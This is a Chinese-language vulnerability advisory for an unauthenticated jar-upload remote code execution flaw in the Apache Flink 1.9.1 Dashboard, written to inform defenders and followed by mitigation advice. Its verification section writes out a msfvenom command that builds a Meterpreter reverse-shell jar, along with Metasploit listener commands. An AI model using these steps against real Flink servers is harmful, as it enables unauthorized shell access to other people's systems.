漏洞编号和级别

CVE编号：暂无，危险级别：高危，CVSS分值：官方未评定

影响版本

至目前最新版本Apache Flink 1.9.1

漏洞概述

Apache Flink是由Apache软件基金会开发的开源流处理框架，其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序，Flink的流水线运行时系统可以执行批处理和流处理程序。此外，Flink的运行时本身也支持迭代算法的执行。

Apache Flink的数据流编程模型在有限和无限数据集上提供单次事件（event-at-a-time）处理。在基础层面，Flink程序由流和转换组成。

Apache Flink的API：有界或无界数据流的数据流API、用于有界数据集的数据集API、表API。

Apache Flink Dashboard 中可上传恶意jar包并触发恶意代码执行。由于Apache Flink Dashboard 默认无需认证即可访问，因此该漏洞可用作获取shell。

漏洞验证

POC：https://twitter.com/jas502n/status/1193869996717297664。

测试环境：Apache Flink 1.9.1

1、上传msf生成的jar包,生成rce.jar文件

msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar

2、配置msf监听

use exploit/multi/handler

set payload java/shell/reverse_tcp

set LHOST 127.0.0.1

set LPORT 8087

show options

run

在Submit New Job处上传rec.jar文件，点击submit

成功反弹shell，执行id可看到结果

修复建议

该漏洞官方尚未发布安全更新以及解决方法，请受影响的用户实时关注Apache Flink官网：https://flink.apache.org/downloads.html。

缓解措施：

建议设置防火墙策略，仅允许白名单ip访问 apache flink服务，并在Web代理（如apache httpd）中增加对该服务的digest认证。

参考链接

https://twitter.com/jas502n/status/1193869996717297664